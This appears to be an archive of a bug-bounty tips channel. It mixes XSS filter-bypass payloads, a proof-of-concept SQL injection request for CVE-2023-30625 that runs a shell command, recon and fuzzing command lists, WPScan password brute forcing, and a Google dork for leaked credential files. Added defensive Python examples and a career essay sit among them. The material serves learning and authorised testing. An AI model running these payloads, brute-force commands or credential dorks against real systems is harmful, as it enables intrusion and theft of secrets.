Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Subscribers: 5 853 (+11 in 24 hours, +68 in 7 days, +374 in 30 days)
Post archive
Guys, check out how a normal person and a hacker solve the tough puzzle.
I hope you like it.
follow
XSS Payload:-
<script>/&/-alert(1)</script>
%00%00%00%00%00%00%00<script>alert(1)</script> (1.Null bytes are output 2.There is no space character immediately before)
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9">
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
<script>alert.call(null,1)</script> (alert.call(%20, "XSS");)
<script>confirm.call(null,1)</script>
<script>prompt.call(null,1)</script>
<script>alert.apply(null, [1])</script>
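Why payloads like the ones in the post above matter to whoever maintains the input handling, as an added example that is not part of the original post: a keyword blocklist is compared with output encoding. The blocklist pattern and the `render_comment` helper are hypothetical.

```python
import html
import re

# Constructed list: payloads copied from the post above.
PAYLOADS = [
    "<script>/&/-alert(1)</script>",
    '<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9">',
    "<bleh/onclick=top[/al/.source+/ert/.source]``>click",
    "<script>alert.call(null,1)</script>",
    "<script>confirm.call(null,1)</script>",
    "<script>alert.apply(null, [1])</script>",
]

# Hypothetical naive filter: case-sensitive keywords and literal call syntax.
NAIVE_BLOCKLIST = re.compile(r"<svg|javascript:|alert\(|confirm\(|prompt\(")


def passes_blocklist(value):
    """True when the naive filter would let the value through unchanged."""
    return NAIVE_BLOCKLIST.search(value) is None


def render_comment(value):
    """Hardened path: encode on output instead of guessing at bad input."""
    return '<p class="comment">' + html.escape(value, quote=True) + "</p>"


def is_neutralized(value):
    """True when no markup-significant character of the value survives encoding."""
    rendered = render_comment(value)
    inner = rendered[len('<p class="comment">'):-len("</p>")]
    return not any(ch in inner for ch in '<>"')


def audit():
    """Return (payload, slipped_past_blocklist, neutralized_by_encoding) rows."""
    return [(p, passes_blocklist(p), is_neutralized(p)) for p in PAYLOADS]


if __name__ == "__main__":
    for payload, slipped, safe in audit():
        print(f"blocklist bypassed={slipped!s:5} encoded safely={safe!s:5} {payload}")
```

`html.escape` covers HTML body and quoted-attribute contexts only; values placed inside script blocks, URLs or event handlers need the encoder for that context.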
🚀 Thinking of Transitioning to Full-Time Bug Bounty Hunting? Read This!
Embarking on the journey from a traditional job to full-time bug bounty hunting can be daunting yet exhilarating. As someone who transitioned from corporate life to hunting bugs full-time, I understand the allure and the realities that come with it.
First things first: Bug bounty hunting isn't for everyone. It requires a unique blend of technical prowess, patience, and resilience.
Let's debunk some common myths and shed light on the realities of being a bug bounty hunter:
Myth: No More Answering to Bosses
Reality: While you're not reporting to a traditional boss, you'll answer to the platform's rules, guidelines, and sometimes, demanding clients.
Myth: Flexible Working Hours
Reality: Bug hunting knows no clock. You'll find yourself chasing bugs at odd hours, responding to reports, and constantly honing your skills.
Myth: Exotic Work Locations
Reality: While the idea of hunting bugs from a beach sounds enticing, the reality is often a coffee-fueled marathon in front of your screen.
Myth: Hitting 6 - 7 Figures
Reality: While some top hunters achieve impressive earnings, it takes dedication, skill, and sometimes, a stroke of luck to reach those heights.
As a bug bounty hunter, you'll wear many hats:
- Analyst: Analyzing code, identifying vulnerabilities, and crafting exploit strategies.
- Communicator: Effectively conveying findings to platform administrators or clients.
- Strategist: Planning your approach, prioritizing targets, and maximizing your efforts.
- Entrepreneur: Managing your time, finances, and reputation in the bug hunting community.
It's not just about tracking down bugs; it's about nonstop learning, versatility, and strength despite dismissal and misfortunes.
To thrive as a bug bounty hunter, you need more than technical skills:
- Managerial Skills: Managing your time, resources, and priorities effectively.
- Leadership Skills: Inspiring others, building relationships, and fostering collaboration within the community.
- Patience: Bugs don't always reveal themselves immediately. Patience is key.
- Risk Management: Knowing when to push boundaries and when to tread cautiously.
- Stress Management: The hunt can be stressful. Finding healthy coping mechanisms is essential.
Before taking the leap, consider this advice:
- Start as a side hustle: Test the waters, build your skills, and gauge your earning potential.
- Financial Security: Ensure you have a financial cushion before diving into full-time bug hunting.
- Set Realistic Expectations: Success in bug bounty hunting takes time. Be prepared for a journey filled with ups and downs.
In conclusion, transitioning to full-time bug bounty hunting is a bold move that can lead to immense personal and professional growth. However, it's not a decision to be taken lightly. Equip yourself with the skills, mindset, and resources needed to thrive in this dynamic field.
Remember, the bug bounty community is incredibly supportive. Lean on your peers, embrace the challenges, and keep hunting! 🚀🔍
Rudder Server < 1.3.0-rc.1 - SQL Injection
CVE-2023-30625
POST /v1/warehouse/pending-events HTTP/1.1
Host: {{Hostname}}
{"source_id": "test'; copy (SELECT '') to program 'id'-- - "}
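A defensive view of the request above, as an added example that is not Rudder Server's code: it flags the `copy ... to program` pattern in `source_id`, and shows that a bound parameter treats the same value as plain data. The `pending_events` table, the ID format and the use of SQLite as a stand-in for PostgreSQL are assumptions.

```python
import json
import re
import sqlite3

# Constructed request bodies: one benign, one carrying the payload quoted above.
BENIGN = json.dumps({"source_id": "2Xk9aQwErTy"})
MALICIOUS = json.dumps({"source_id": "test'; copy (SELECT '') to program 'id'-- - "})

SOURCE_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")  # assumed ID format
COPY_PROGRAM_RE = re.compile(r"\bcopy\b.+?\bto\s+program\b", re.IGNORECASE | re.DOTALL)


def classify_body(raw_body):
    """Return 'ok', 'invalid' or 'sqli-copy-program' for a pending-events body."""
    try:
        source_id = json.loads(raw_body).get("source_id")
    except (ValueError, AttributeError):
        return "invalid"
    if not isinstance(source_id, str):
        return "invalid"
    if COPY_PROGRAM_RE.search(source_id):
        return "sqli-copy-program"
    return "ok" if SOURCE_ID_RE.fullmatch(source_id) else "invalid"


def concatenated_sql(source_id):
    """Vulnerable pattern: the quote inside the value ends the string literal."""
    return "SELECT COUNT(*) FROM pending_events WHERE source_id = '" + source_id + "'"


def pending_count(conn, source_id):
    """Hardened pattern: the value is bound, never spliced into the SQL text."""
    query = "SELECT COUNT(*) FROM pending_events WHERE source_id = ?"
    return conn.execute(query, (source_id,)).fetchone()[0]


def demo():
    conn = sqlite3.connect(":memory:")  # stand-in database for the example
    conn.execute("CREATE TABLE pending_events (source_id TEXT)")
    conn.execute("INSERT INTO pending_events VALUES ('2Xk9aQwErTy')")
    payload = json.loads(MALICIOUS)["source_id"]
    return {
        "benign": classify_body(BENIGN),
        "malicious": classify_body(MALICIOUS),
        "concat_has_second_statement": "; copy" in concatenated_sql(payload),
        "bound_benign_rows": pending_count(conn, "2Xk9aQwErTy"),
        "bound_payload_rows": pending_count(conn, payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```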
✔️ Complete Bug Bounty tool List ✊
Enjoy :)
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuite https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
Retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
Extra Tools
http://projectdiscovery.io
Step 1: Subdomain Enumeration
•DNS Dumpster
•Sublist3r
•Amass
•Google Dorking
•Certificate Transparency Logs
•subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Inject Burp Collaborator URL in Parameters
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
cat httpx.txt | aquatone -scan-timeout 3000 -threads 5 -silent -screenshot-timeout 50000 -http-timeout 20000 -out screenshots-folder
echo "domain" | waybackurls "$line" | sudo ./qsreplace | grep --color=auto "=" | parallel -j50 -q curl -Isk --max-time 2 -w '%{url_effective}' | grep --color=auto -iE "Location" | sed -e 's!Location:!!' | sudo httpx -status-code;
done
sudo dirsearch -u "target.com" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x 403
sudo dirsearch -u "target.com/access/reset" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFUYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -x 403
sudo dirsearch -u "target.com" -w /home/SecLists-master/Discovery/Web-Content/common.txt -r -x 403 -o dir.txt
**Content Discovery Introduction to FFUF
ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u https://targetcom/d/setting/FUZZ -t 50 -ac -c
ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u www.target[].com/FUZZ -t 75
ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -o ffuf.txt
└─$ python3 ffuf-json.py
ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt | tee dir.txt
ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0
ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all
ffuf -u "https://ftarget[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all -fc 404
ffuf -u "target.target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac
ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac -fs 0 -fl 1
ffuf -u "https://target][.com/access/reset/FUZZUser" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt
ffuf -u "https://target[].com/access/resetFUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fc 403
ffuf -u "target.com/access/reset/F…" -w /home/SecLists-master/Discovery/Web-Content/common.txt -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFU1MiLCJpc3MiOiJBQ0NFU1MiLCJwYXlsb2FkIjp7ImxvZ2luIjpudfdXNlcm5hbWUiOm51bGwsImxhc3Rfc2F2ZWRfdXNlcm5hbWUiOm51bGwsImNvcnJlbGF0aW9uX2lkIjoiZjdlMjQ4ZjAtNDY3ZS00OTA5LTg2YWYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -H "Test:admin"
Passive Enumeration GetAllUrls
echo "https://target][.com" | gau
echo "target.target[.[com/access/reset" | gau > gau.txt
sudo echo "target.com" | getallurls | sort -u | grep -v www > gau.txt
To avoid duplicates:
cat gau.txt | grep "=" | sort -u
Passive Enumeration Waybackurls
sudo echo "www.target[].com" | waybackurls > gau.txt
echo "https://target.[]com" | gau > gau.txt && sudo echo "target.com" | waybackurls > way.txt && cat gau.txt | grep "=" | sort -u > sorted.txt
katana -u "https://uber.onelogin[].com/" -jc -d 4 -o katana-ube.txt
python3 cloudflair.py glassdoor.[]com
Single URL:
echo https://google.[]com | hakrawler
Multiple URLs:
cat urls.txt | hakrawler
Timeout for each line of stdin after 5 seconds:
cat urls.txt | hakrawler -timeout 5
Send all requests through a proxy:
cat urls.txt | hakrawler -proxy http://localhost:8080
echo https://google.[]com | hakrawler -subs
echo google.][com | haktrails subdomains | httpx | hakrawler
echo www.google.][com | docker run --rm -i hakluke/hakrawler:v2 -subs
echo www.google.[com | docker run --rm -i hakluke/hakrawler -subs
pripshttps://www.google.][comoriginfinder -h https://example.][]com:443/foo
$ prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one[]:80/index.html -p 80,443,8080,8443
xnLinkFinder
python3 xnLinkFinder.py -i redbull.com -sp redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u
🚀🚀DISCOVERING DOMAIN🔥🔥🔥🔥
#DAY11
Look for Asn!!!
bgp.he.net/search?search%…
dnslytics.com/dns-lookup
whoxy.com
AMASS
sudo amass enum -brute -d www.targett[].mil -o target.txt -p 80,443,8080,8443,8000
sudo amass enum -active -brute -d www.targett[].mil -o targett.mil.txt -p 80,443,8080,8443,8000
amass enum -v -src -ip -brute -min-for-recursive 2 -d targett.com
-----------------------------------------------------------------
*amass asn
amass intel -org "TARGET" -v
amass intel -asn 205952 -o ans.txt -v
amass enum -d targett.]com -o ubesubdoamin.txt -v
hunting - Subdomain Enumeration Subfinder
subfinder -d targett.]com -o domain.txt
subfinder -d targett.]com -sources securitytrails
*To see how many domains were found
wc domain.txt
*Subdomain Enumeration AMASS
cat amass_subdomains.txt | grep "targett.]com"
cat amass_subdomains.txt | grep -o "targett.]com"
cat ssrf-uber1.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*uber\.com"
cat amass_subdomains.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*hackerone\.com"
*Subdomain Enumeration Bruteforcing /usr/share/seclists/Discovery/DNS
/home/casperino/Desktop/best-dns-wordlist.txt
*Subdomain Bruteforcing FFuF
ffuf -u "http://FUZZ.targett.]com" -w /home/Desktop/best-dns-wordlist.txt -t 50
*Subdomain Bruteforcing GoBuster
gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt
Subdomain Bruteforcing AMASS
amass enum -d targett.]com -brute -w /home/Desktop/best-dns-wordlist.txt -v
*Subdomain Bruteforcing PureDNS
puredns bruteforce /home/Desktop/best-dns-wordlist.txt targett.]com --resolvers resolvers.txt
*Subdomain Enumeration VHOST
sudo nano /etc/hosts
192.168.1.1 targett.com
ffuf -u "targett.com" -H "Host: FUZZ.targett.com" -w /home/Desktop/best-dns-wordlist.txt
*Combining Tools
amass enum -d targett.com -o amass.txt -nocolor -v
cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com"
cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new_.txt
3-sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new_.txt"
subfinder -d targett.com -o subfinder.txt -v
cat amass_new_.txt subfinder.txt | sort -u > sorted.txt
5-sudo bash -c "cat amass_new_.txt subfinder.txt | sort -u > sorted.txt"
cat amass_new_.txt subfinder.txt > new.txt
6-sudo bash -c "cat amass_new_.txt subfinder.txt > new.txt"
wc new.txt
wc sorted.txt
amass enum -d targett.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d targett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt
sudo bash -c "amass enum -d tagett.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d tagett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt"
amass enum -d targett.com -o amass.txt -nocolor -v && subfinder -d targett.com -o subfinder.txt && cat amass.txt subfinder.txt | sort -u > sorted.txt
*Filtering Live Domains/Subdomains
cat subdomain2.txt | httpx -o http.txt
cat subdomain2.txt | httpx -o http.txt -title
**Finding Origin IP Address 1 only with cloudflare
search.censys.io/hosts/34.120.2…
ping bepractical.tech
whois bepractical.tech
python3 cloudflair.py bepractical.tech
***Finding Origin IP Address 2
securitytrails.com/domain/www.air…
***Port Scanning with NMAP
sudo nmap -sF
sudo nmap -sN -sS -vv
nmap -iL mil-domains.txt -p80,443,8080,8000,8443,1000
sudo nmap -sV -sC -p- 154.56.61.191 -vv
sudo nmap -sV -sC -p- 154.56.61.191 -vv -T 5
***Vulnerability Scanning with NMAP
sudo nmap -sV -sC -p 80 154.56.61.191 --script=vuln -vv -T 5
nmap --script vulners -sV 192.168.0.0
**Port Scanning with NAABU
naabu -l subfinder.txt -o port.txt -top-ports -v
**Content Discovery Basics of Dirsearch
sudo dirsearch -u "target.com"
sudo dirsearch -u "target.com" -x 403,301
sudo dirsearch -u "target.com" --exclude-status=403,401
💫 CipherOps said YES to our journey together! Embarking on a path filled with innovation, growth, and shared success. ❤️🚀 #DreamsComeTrue"
Program has "All in scope" in their policy? Use this checklist 📋 to collect list of root domains:
✅ Inspect the footer of their pages. Sometimes companies like to use the same footer across all their domains. For example: "© 2024 The Coca‑Cola Company. All rights reserved." could be used as "The Coca‑Cola Company. All rights reserved." dork on Google!
✅ Check the organisation name on the SSL certificate. Copy it to http://crt.sh and shodan. For example, to query "The Coca‑Cola Company" via http://crt.sh CLI:
curl -s "https://crt.sh/?q=The+Coca‑Cola+Company&output=json" | jq -r '.[] | .common_name' | sort -u
NOTE: Some domains could be very old, outdated or already belong to another company, so make sure to inspect them manually.
✅ For shodan, use org:"The Coca‑Cola Company" or ssl:http://coca-colacompany.com to check the assets. Inspect the hostnames on shodan query response and collect them to your list.
✅ For FOFA https://en.fofa.info, place the company name in the search bar, as for example - "The Coca‑Cola Company". Select the favicons, of your company and filter the results. You could also copy those favicon values to shodan search and use favicon:"<value>" as the shodan dork.
#BugBounty #bugbountytip #itsecurity
🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey!
#Day7🕵️♂️💻
👨💻 Now, I'm sharing my code and notes to help You!!🎯
🔗 Check out
===Nmap
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP
###HTTP-Methods
nmap --script http-methods --script-args http-methods.url-path='/website'
###sed IPs:
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE
--script smb-enum-shares
===WPScan & SSL
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
===WPScan Brute Forcing:
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt
===Aggressive Plugin Detection:
wpscan --url $URL --plugins-detection aggressive --enumerate p
===Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1
SEE EVASION MODALITIES.
===dns_recon
dnsrecon -d yourdomain.com
===gobuster directory
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
===gobuster files
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
===gobuster for SubDomain brute forcing:
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
Just make sure any DNS name you find resolves to an in-scope address before you test it!
===Extract IPs from a text file.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt
===Wfuzz XSS Fuzzing
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"
===COMMAND INJECTION WITH POST DATA
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"
===Test for Parameter Existence!
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"
===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"
===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"
===FUZZ Directories:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"
===FUZZ FILES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"
📚 Learn, practice, and let's achieve OSCP success together! 💪🏆
#OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp
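The scope reminder in the notes above (a discovered DNS name must resolve to an in-scope address before it is tested) can be enforced mechanically. This is an added example, not part of the original notes; the hostnames, addresses and scope range are constructed from documentation ranges, and the verdict labels are this example's own.

```python
import ipaddress
import socket


def resolve(hostname):
    """Resolve with the system resolver; returns a sorted list of address strings."""
    try:
        infos = socket.getaddrinfo(hostname, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def classify_hosts(hostnames, scope_cidrs, resolver=resolve):
    """Map each hostname to in-scope, partial, out-of-scope or unresolved."""
    networks = [ipaddress.ip_network(cidr, strict=False) for cidr in scope_cidrs]
    verdicts = {}
    for host in hostnames:
        # Drop any IPv6 zone suffix ("%eth0") before parsing.
        addresses = [ipaddress.ip_address(a.split("%")[0]) for a in resolver(host)]
        # An IPv4 address is never "in" an IPv6 network and vice versa.
        hits = [any(addr in net for net in networks) for addr in addresses]
        if not addresses:
            verdicts[host] = "unresolved"
        elif all(hits):
            verdicts[host] = "in-scope"
        elif any(hits):
            verdicts[host] = "partial"  # some records point outside the scope
        else:
            verdicts[host] = "out-of-scope"
    return verdicts


# Constructed sample data: a scope range and pre-resolved DNS answers.
SCOPE = ["203.0.113.0/24"]
CONSTRUCTED_DNS = {
    "app.example.com": ["203.0.113.10"],
    "cdn.example.com": ["198.51.100.7"],  # e.g. a third-party host
    "mix.example.com": ["203.0.113.20", "2001:db8::5"],
    "gone.example.com": [],
}


def demo():
    """Classify the constructed names without touching the network."""
    return classify_hosts(CONSTRUCTED_DNS, SCOPE, resolver=lambda h: CONSTRUCTED_DNS.get(h, []))


if __name__ == "__main__":
    for host, verdict in demo().items():
        print(f"{verdict:13} {host}")
```

Only names marked in-scope go into the target list; partial and out-of-scope names point at least partly at infrastructure the programme did not authorise.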
🔍 Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp
🔍Google dork for searching these filenames on Google:
intext:"filename:config.php" OR
intext:"filename:config.inc.php" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:configuration.php" OR
intext:"filename:.sh_history" OR
intext:"filename:shadow" OR
intext:"filename:proftpdpasswd" OR
intext:"filename:.psafe3" OR
intext:"filename:.pgpass" OR
intext:"filename:manifest.xml" OR
intext:"filename:travis.yml" OR
intext:"filename:vim_settings.xml" OR
intext:"filename:database" OR
intext:"filename:prod.exs" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:.npmrc _auth" OR
intext:"filename:.dockercfg" OR
intext:"filename:WebServers.xml" OR
intext:"filename:.bash_history" OR
intext:"filename:sftp-config.json" OR
intext:"filename:sftp.json" OR
intext:"filename:secrets.yml" OR
intext:"filename:.esmtprc" OR
